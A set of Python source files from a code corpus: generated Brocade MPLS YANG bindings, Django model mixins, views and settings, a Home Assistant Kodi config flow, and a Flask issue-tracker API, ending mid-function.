self.__filtered = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'filtered': {'value': 1}, u'filtered-in': {'value': 2}, u'filtered-out': {'value': 3}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='fec-filter-type', is_config=False)
def _get_prefix_filtered(self):
"""
Getter method for prefix_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix_filtered (string)
YANG Description: filter name
"""
return self.__prefix_filtered
def _set_prefix_filtered(self, v, load=False):
"""
Setter method for prefix_filtered, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix_filtered (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_prefix_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prefix_filtered() directly.
YANG Description: filter name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """prefix_filtered must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__prefix_filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_prefix_filtered(self):
self.__prefix_filtered = YANGDynClass(base=unicode, is_leaf=True, yang_name="prefix-filtered", rest_name="prefix-filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_prefix(self):
"""
Getter method for prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix (list)
"""
return self.__prefix
def _set_prefix(self, v, load=False):
"""
Setter method for prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/prefix (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_prefix is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prefix() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """prefix must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__prefix = t
if hasattr(self, '_set'):
self._set()
def _unset_prefix(self):
self.__prefix = YANGDynClass(base=YANGListType("destination",prefix.prefix, yang_name="prefix", rest_name="prefix", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='destination', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}), is_container='list', yang_name="prefix", rest_name="prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_key(self):
"""
Getter method for key, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/key (container)
"""
return self.__key
def _set_key(self, v, load=False):
"""
Setter method for key, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes/key (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_key is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_key() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """key must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__key = t
if hasattr(self, '_set'):
self._set()
def _unset_key(self):
self.__key = YANGDynClass(base=key.key, is_container='container', presence=False, yang_name="key", rest_name="key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-key-key-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
tot_no_of_prefix_fec = __builtin__.property(_get_tot_no_of_prefix_fec)
tot_no_of_prefix_fec_installed = __builtin__.property(_get_tot_no_of_prefix_fec_installed)
tot_no_of_prefix_fec_filtered = __builtin__.property(_get_tot_no_of_prefix_fec_filtered)
tot_no_of_prefix_fec_lwd = __builtin__.property(_get_tot_no_of_prefix_fec_lwd)
filtered = __builtin__.property(_get_filtered)
prefix_filtered = __builtin__.property(_get_prefix_filtered)
prefix = __builtin__.property(_get_prefix)
key = __builtin__.property(_get_key)
_pyangbind_elements = {'tot_no_of_prefix_fec': tot_no_of_prefix_fec, 'tot_no_of_prefix_fec_installed': tot_no_of_prefix_fec_installed, 'tot_no_of_prefix_fec_filtered': tot_no_of_prefix_fec_filtered, 'tot_no_of_prefix_fec_lwd': tot_no_of_prefix_fec_lwd, 'filtered': filtered, 'prefix_filtered': prefix_filtered, 'prefix': prefix, 'key': key, }
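# ---------------------------------------------------------------------------
# Editorial usage sketch -- not part of the generated bindings. A minimal,
# hypothetical example (Python 2, matching the unicode/long/__builtin__ usage
# above) of how a backend might populate and read this operational container;
# it assumes this package and its sibling `prefix` and `key` modules import
# cleanly.
if __name__ == '__main__':
    fecs = ldp_fec_prefixes()
    # Every leaf here is operational state (config: false), so pyangbind does
    # not expose public setters; backends call the private _set_* methods:
    fecs._set_tot_no_of_prefix_fec(42)
    fecs._set_tot_no_of_prefix_fec_installed(40)
    print fecs.tot_no_of_prefix_fec             # read back via the property
    print fecs._path()                          # [u'mpls-state', u'ldp', ...]
    try:
        fecs._set_tot_no_of_prefix_fec('not-a-uint32')  # type-checked
    except ValueError as err:
        print err.args[0]['error-string']
# ---------------------------------------------------------------------------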
| en | 0.502833 |  | 1.847884 | 2 |
pug/dj/miner/model_mixin.py | hobson/pug-dj | 0 | 10316 | from pug.nlp.db import representation
from django.db import models
class RepresentationMixin(models.Model):
"""Produce a meaningful string representation of a model with `str(model.objects.all[0])`."""
__unicode__ = representation
class Meta:
abstract = True
class DateMixin(models.Model):
"""Add updated and created fields that auto-populate to create a ORM-level transaction log for auditing (though not a full log, just 2 events)."""
updated = models.DateTimeField(auto_now=True)
created = models.DateTimeField(auto_now_add=True)
class Meta:
abstract = True
| en | 0.792242 | Produce a meaningful string representation of a model with `str(model.objects.all()[0])`. Add updated and created fields that auto-populate to create an ORM-level transaction log for auditing (though not a full log, just 2 events). | 2.568376 | 3
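A minimal sketch (not from the repository; the Thing model and its field are assumptions added for illustration) of how the two abstract mixins above would be combined in a concrete model:

from django.db import models

class Thing(RepresentationMixin, DateMixin):
    # Inherits __unicode__ from RepresentationMixin and the created/updated
    # audit fields from DateMixin; only domain fields are declared here.
    name = models.CharField(max_length=64)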
custom_components/kodi_media_sensors/config_flow.py | JurajNyiri/kodi-media-sensors | 5 | 10317 | import logging
from typing import Any, Dict, Optional
from homeassistant import config_entries
from homeassistant.components.kodi.const import DOMAIN as KODI_DOMAIN
from homeassistant.core import callback
import voluptuous as vol
from .const import (
OPTION_HIDE_WATCHED,
OPTION_USE_AUTH_URL,
OPTION_SEARCH_LIMIT,
OPTION_SEARCH_LIMIT_DEFAULT_VALUE,
CONF_KODI_INSTANCE,
DOMAIN,
CONF_SENSOR_RECENTLY_ADDED_TVSHOW,
CONF_SENSOR_RECENTLY_ADDED_MOVIE,
CONF_SENSOR_PLAYLIST,
CONF_SENSOR_SEARCH,
)
_LOGGER = logging.getLogger(__name__)
class KodiMediaSensorsConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Kodi Media Sensors config flow."""
async def async_step_user(self, user_input: Optional[Dict[str, Any]]):
"""Handle a flow initialized via the user interface."""
# Find all configured kodi instances to allow the user to select one.
kodi_instances: Dict[str, str] = {
entry.entry_id: entry.title
for entry in self.hass.config_entries.async_entries(KODI_DOMAIN)
if entry.source != "ignore"
}
data_schema = vol.Schema(
{
vol.Required(CONF_KODI_INSTANCE): vol.In(list(kodi_instances.values())),
vol.Optional(CONF_SENSOR_RECENTLY_ADDED_TVSHOW, default=False): bool,
vol.Optional(CONF_SENSOR_RECENTLY_ADDED_MOVIE, default=False): bool,
vol.Optional(CONF_SENSOR_PLAYLIST, default=False): bool,
vol.Optional(CONF_SENSOR_SEARCH, default=False): bool,
}
)
errors = {}
if not kodi_instances:
errors["base"] = "kodi_not_configured"
if user_input is not None:
config_entry_id: Optional[str] = None
for entry_id, title in kodi_instances.items():
if title == user_input[CONF_KODI_INSTANCE]:
config_entry_id = entry_id
break
if config_entry_id is None:
errors["base"] = "kodi_not_configured"
if not errors:
return self.async_create_entry(
title="Kodi Media Sensors",
data={
CONF_KODI_INSTANCE: config_entry_id,
CONF_SENSOR_RECENTLY_ADDED_TVSHOW: user_input[
CONF_SENSOR_RECENTLY_ADDED_TVSHOW
],
CONF_SENSOR_RECENTLY_ADDED_MOVIE: user_input[
CONF_SENSOR_RECENTLY_ADDED_MOVIE
],
CONF_SENSOR_PLAYLIST: user_input[CONF_SENSOR_PLAYLIST],
CONF_SENSOR_SEARCH: user_input[CONF_SENSOR_SEARCH],
},
)
return self.async_show_form(
step_id="user",
data_schema=data_schema,
errors=errors,
)
@staticmethod
@callback
def async_get_options_flow(config_entry):
"""Get the options flow for this handler."""
return OptionsFlowHandler(config_entry)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Handles options flow for the component."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
self.config_entry = config_entry
async def async_step_init(self, user_input=None):
"""Manage the options."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
hide_watched = self.config_entry.options.get(OPTION_HIDE_WATCHED, False)
use_auth_url = self.config_entry.options.get(OPTION_USE_AUTH_URL, False)
search_limit = self.config_entry.options.get(
OPTION_SEARCH_LIMIT, OPTION_SEARCH_LIMIT_DEFAULT_VALUE
)
options_schema = vol.Schema(
{
vol.Optional(OPTION_HIDE_WATCHED, default=hide_watched): bool,
vol.Optional(OPTION_USE_AUTH_URL, default=use_auth_url): bool,
vol.Optional(OPTION_SEARCH_LIMIT, default=search_limit): int,
}
)
return self.async_show_form(
step_id="init",
data_schema=options_schema,
)
| en | 0.752426 | Kodi Media Sensors config flow. Handle a flow initialized via the user interface. # Find all configured kodi instances to allow the user to select one. Get the options flow for this handler. Handles options flow for the component. Manage the options. | 2.100883 | 2
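A short standalone sketch (an illustration, not code from the repository) of the voluptuous behaviour the flows above rely on: a schema built from vol.Optional entries fills in defaults for missing keys and rejects values of the wrong type.

import voluptuous as vol

options_schema = vol.Schema({
    vol.Optional("hide_watched", default=False): bool,
    vol.Optional("search_limit", default=50): int,
})

print(options_schema({}))                    # {'hide_watched': False, 'search_limit': 50}
print(options_schema({"search_limit": 10}))  # {'hide_watched': False, 'search_limit': 10}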
MySite/MainApp/views.py | tananyan/siteee | 1 | 10318 | from django.shortcuts import render
from django.views.generic.edit import FormView
from django.views.generic.edit import View
from . import forms
# Again, thanks to django for the ready-made authentication form.
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import logout
from django.http import HttpResponseRedirect
from django.contrib.auth import login
class index(FormView):
form_class = AuthenticationForm
    # Same as registration, but using the authentication template.
    template_name = "MainApp/homepage.html"
    # On success, redirect to the home page.
success_url = "/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/homepage.html',
{'form': form1, 'user': request.user})
def form_valid(self, form):
        # Get the user object based on the data entered into the form.
        self.user = form.get_user()
        # Authenticate the user.
login(self.request, self.user)
return super(index, self).form_valid(form)
class contact(FormView):
form_class = AuthenticationForm
    # Same as registration, but using the authentication template.
    template_name = "MainApp/contact.html"
    # On success, redirect to the home page.
success_url = "../contact/"
def get(self, request):
form1 = AuthenticationForm(request.POST)
return render(request, 'MainApp/contact.html',
{'values': ['Звоните по телефону', '<EMAIL>', '8(977)335-77-77'], 'form': form1, 'user': request.user})
def form_valid(self, form):
        # Get the user object based on the data entered into the form.
        self.user = form.get_user()
        # Authenticate the user.
login(self.request, self.user)
return super(contact, self).form_valid(form)
class registration(FormView):
form_class = forms.UserCreationForm
    # URL the user is redirected to after successful registration.
    # In this case it points to the login page for registered users.
    success_url = "/login/"
    # Template used to render the view.
template_name = "MainApp/registration_form.html"
def form_valid(self, form):
        # Create the user if the form data was entered correctly.
        form.save()
        # Call the base class method.
return super(registration, self).form_valid(form)
class LogoutView(View):
def get(self, request):
        # Log out the user who requested this view.
        logout(request)
        # Then redirect the user to the home page.
#return HttpResponseRedirect("/seeuagain")
return render(request, 'MainApp/quitpage.html')
class LoginFormView(FormView):
form_class = AuthenticationForm
    # Same as registration, but using the authentication template.
    template_name = "MainApp/login_form.html"
    # On success, redirect to the home page.
success_url = "/news"
def form_valid(self, form):
        # Get the user object based on the data entered into the form.
        self.user = form.get_user()
        # Authenticate the user.
login(self.request, self.user)
return super(LoginFormView, self).form_valid(form)
| ru | 0.99303 | # Again, thanks to django for the ready-made authentication form. # Same as registration, but using the authentication template. # On success, redirect to the home page. # Get the user object based on the data entered into the form. # Authenticate the user. # Same as registration, but using the authentication template. # On success, redirect to the home page. # Get the user object based on the data entered into the form. # Authenticate the user. # URL the user is redirected to after successful registration. # In this case it points to the login page for registered users. # Template used to render the view. # Create the user if the form data was entered correctly. # Call the base class method. # Log out the user who requested this view. # Then redirect the user to the home page. #return HttpResponseRedirect("/seeuagain") # Same as registration, but using the authentication template. # On success, redirect to the home page. # Get the user object based on the data entered into the form. # Authenticate the user. | 2.143732 | 2
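A hypothetical urls.py (an assumption for illustration; the project's real routing is not part of this file) showing how the class-based views above could be wired up:

from django.conf.urls import url
from MainApp import views

urlpatterns = [
    url(r'^$', views.index.as_view()),
    url(r'^contact/$', views.contact.as_view()),
    url(r'^registration/$', views.registration.as_view()),
    url(r'^login/$', views.LoginFormView.as_view()),
    url(r'^logout/$', views.LogoutView.as_view()),
]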
imagetagger/imagetagger/settings_base.py | jbargu/imagetagger | 1 | 10319 | """
Django settings for imagetagger project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
from django.contrib.messages import constants as messages
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'imagetagger.annotations',
'imagetagger.base',
'imagetagger.images',
'imagetagger.users',
'imagetagger.tools',
'imagetagger.administration',
'django.contrib.admin',
'imagetagger.tagger_messages',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'widget_tweaks',
'friendlytagloader',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
]
ROOT_URLCONF = 'imagetagger.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'imagetagger.base.context_processors.base_data',
],
},
},
]
WSGI_APPLICATION = 'imagetagger.wsgi.application'
FILE_UPLOAD_HANDLERS = (
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'users.User'
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin' # Timezone of your server
USE_I18N = True
USE_L10N = True
USE_TZ = True
PROBLEMS_URL = 'https://github.com/bit-bots/imagetagger/issues'
PROBLEMS_TEXT = ''
LOGIN_URL = '/user/login/'
LOGIN_REDIRECT_URL = '/images/'
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
MESSAGE_TAGS = {
messages.INFO: 'info',
messages.ERROR: 'danger',
messages.WARNING: 'warning',
messages.SUCCESS: 'success',
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
EXPORT_SEPARATOR = '|'
DATA_PATH = os.path.join(BASE_DIR, 'data')
IMAGE_PATH = os.path.join(BASE_DIR, 'images') # the absolute path to the folder with the imagesets
# filename extensions of accepted image files
IMAGE_EXTENSION = {
'png',
'jpeg',
}
# Sets the default expire time for new messages in days
DEFAULT_EXPIRE_TIME = 7
# Sets the default number of messages per page
MESSAGES_PER_PAGE = 10
| """
Django settings for imagetagger project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
from django.contrib.messages import constants as messages
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'imagetagger.annotations',
'imagetagger.base',
'imagetagger.images',
'imagetagger.users',
'imagetagger.tools',
'imagetagger.administration',
'django.contrib.admin',
'imagetagger.tagger_messages',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'widget_tweaks',
'friendlytagloader',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
]
ROOT_URLCONF = 'imagetagger.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'imagetagger.base.context_processors.base_data',
],
},
},
]
WSGI_APPLICATION = 'imagetagger.wsgi.application'
FILE_UPLOAD_HANDLERS = (
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
AUTH_USER_MODEL = 'users.User'
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin' # Timezone of your server
USE_I18N = True
USE_L10N = True
USE_TZ = True
PROBLEMS_URL = 'https://github.com/bit-bots/imagetagger/issues'
PROBLEMS_TEXT = ''
LOGIN_URL = '/user/login/'
LOGIN_REDIRECT_URL = '/images/'
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
MESSAGE_TAGS = {
messages.INFO: 'info',
messages.ERROR: 'danger',
messages.WARNING: 'warning',
messages.SUCCESS: 'success',
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
EXPORT_SEPARATOR = '|'
DATA_PATH = os.path.join(BASE_DIR, 'data')
IMAGE_PATH = os.path.join(BASE_DIR, 'images') # the absolute path to the folder with the imagesets
# filename extension of accepted imagefiles
IMAGE_EXTENSION = {
'png',
'jpeg',
}
# Sets the default expire time for new messages in days
DEFAULT_EXPIRE_TIME = 7
# Sets the default number of messages per page
MESSAGES_PER_PAGE = 10
| en | 0.637708 | Django settings for imagetagger project. Generated by 'django-admin startproject' using Django 1.10.3. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) # SECURITY WARNING: don't run with debug turned on in production! # Application definition # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ # Timezone of your server # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.10/howto/static-files/ # the absolute path to the folder with the imagesets # filename extension of accepted imagefiles # Sets the default expire time for new messages in days # Sets the default number of messages per page | 1.82748 | 2 |
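A brief, hypothetical example (not part of the settings module) of how application code would consume the custom settings defined above, e.g. when checking an upload against IMAGE_EXTENSION:

from django.conf import settings

def is_accepted_image(filename):
    # True when the file extension is in the accepted set ('png', 'jpeg').
    return filename.rsplit('.', 1)[-1].lower() in settings.IMAGE_EXTENSION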
apps/project/views/issue.py | rainydaygit/testtcloudserver | 349 | 10320 | from flask import request
from apps.auth.auth_require import required
from apps.project.business.issue import IssueBusiness, IssueRecordBusiness, IssueDashBoardBusiness
from apps.project.extentions import parse_json_form, validation, parse_list_args2
from library.api.render import json_detail_render, json_list_render2
from library.api.tBlueprint import tblueprint
bpname = 'issue'
view_permission = f'{bpname}_view'
modify_permission = f'{bpname}_modify'
issue = tblueprint(bpname, __name__)
# Create a new issue
@issue.route('/', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_create')
def issue_add_handler():
"""
    @api {post} /v1/issue Create an issue
    @apiName CreateIssue
    @apiGroup Project
    @apiDescription Create a new issue (defect)
    @apiParam {int} module_id module ID
    @apiParam {int} handler assignee ID
    @apiParam {int} issue_type issue type
    @apiParam {int} chance occurrence probability
    @apiParam {int} level severity level
    @apiParam {int} priority priority
    @apiParam {int} system system
    @apiParam {string} title title
    @apiParam {string} attach attachment
    @apiParam {string} description description
    @apiParam {int} detection_chance user detection chance
    @apiParam {int} project_id project ID
    @apiParam {int} version version
    @apiParam {int} creator creator ID
    @apiParam {int} modifier modifier ID
    @apiParam {int} [requirement_id] linked requirement ID
    @apiParam {string} [tag] tags
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 123,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, creator, modifier, handler,
     issue_type, chance, level, priority, stage, title, attach, handle_status,
description, comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_create')
ret = IssueBusiness.create(system, version, project_id, module_id, creator, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
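# Illustrative only (not part of the original module): a client-side sketch of
# calling the create endpoint above. The host, port and payload values are
# assumptions, and the payload may not satisfy the full 'issue_create' schema.
#
#   import requests
#   payload = {"module_id": 1, "handler": 1, "issue_type": 0, "chance": 0,
#              "level": 0, "priority": 0, "system": 1, "title": "demo",
#              "description": "demo", "project_id": 1, "version": 1,
#              "creator": 1, "modifier": 1}
#   resp = requests.post("http://localhost:5000/v1/issue", json=payload)
#   print(resp.json())  # expected shape: {"code": 0, "data": [], "message": "ok"}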
# Modify an issue by id
@issue.route('/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_modify')
def issue_modify_handler(issue_id):
"""
    @api {post} /v1/issue/{int:id} Modify an issue
    @apiName ModifyIssue
    @apiGroup Project
    @apiDescription Modify an issue (defect)
    @apiParam {int} module_id module ID
    @apiParam {int} handler assignee ID
    @apiParam {int} issue_type issue type
    @apiParam {int} chance occurrence probability
    @apiParam {int} level severity level
    @apiParam {int} priority priority
    @apiParam {int} system system
    @apiParam {string} title title
    @apiParam {string} attach attachment
    @apiParam {string} description description
    @apiParam {int} detection_chance user detection chance
    @apiParam {int} project_id project ID
    @apiParam {int} version version
    @apiParam {int} creator creator ID
    @apiParam {int} modifier modifier ID
    @apiParam {int} [requirement_id] linked requirement ID
    @apiParam {string} [tag] tags
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 1,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description,
comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_modify')
ret = IssueBusiness.modify(issue_id, system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
# Delete an issue by id
@issue.route('/<int:issue_id>', methods=['DELETE'])
def issue_delete_handler(issue_id):
"""
    @api {delete} /v1/issue/{int:id} Delete an issue
    @apiName DeleteIssue
    @apiGroup Project
    @apiDescription Delete an issue (defect)
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
ret = IssueBusiness.delete(issue_id)
return json_detail_render(ret)
# Switch issue status
@issue.route('/handlestatus/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:handle_status')
def issue_board_status_handler(issue_id):
"""
    @api {post} /v1/issue/handlestatus/{int:id} Switch issue status
    @apiName ModifyIssueStatus
    @apiGroup Project
    @apiDescription Switch the handling status of an issue
@apiParamExample {json} Request-Example:
{
"handle_status": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handle_status = parse_json_form('handle_status')[0]
